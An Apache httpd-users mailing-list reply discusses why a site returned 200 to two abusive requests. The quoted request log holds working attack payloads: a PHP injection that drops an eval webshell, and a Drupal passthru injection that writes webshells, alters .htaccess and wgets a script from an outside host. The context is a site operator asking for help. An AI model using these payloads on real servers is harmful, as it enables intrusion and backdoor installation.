httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From William A Rowe Jr <wr...@rowe-clan.net>
Subject Re: [users@httpd] Strange responses
Date Sun, 07 Apr 2019 21:16:02 GMT
The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'?
Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?'
query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto <kohmoto@iris.eonet.ne.jp> wrote:

> Hi,
>
> I operate my site with httpd 2.4.39 with ssl option.
>
> Yesterday, strange responses were observed.
>
> My site received the following abuse requests.  Except the following
> requests, the httpd return 404 error to obvious abuse requets. However,
> as to the following two queries, the httpd seemed to return a message
> when it receives 'GET /' with 200 status.  I  expect the httpd should
> return 404 error.
>
> Case 1:
> GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>
> HTTP/1.1
>
> Case 2:
> POST
>
> /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%
> 2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
> HTTP/1.1
>
> It would be very appriciated if someone could advise me.
>
> Thank you.
>
> Yours truly,
>
> Kazuhiko Kohmoto
>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

Mime
View raw message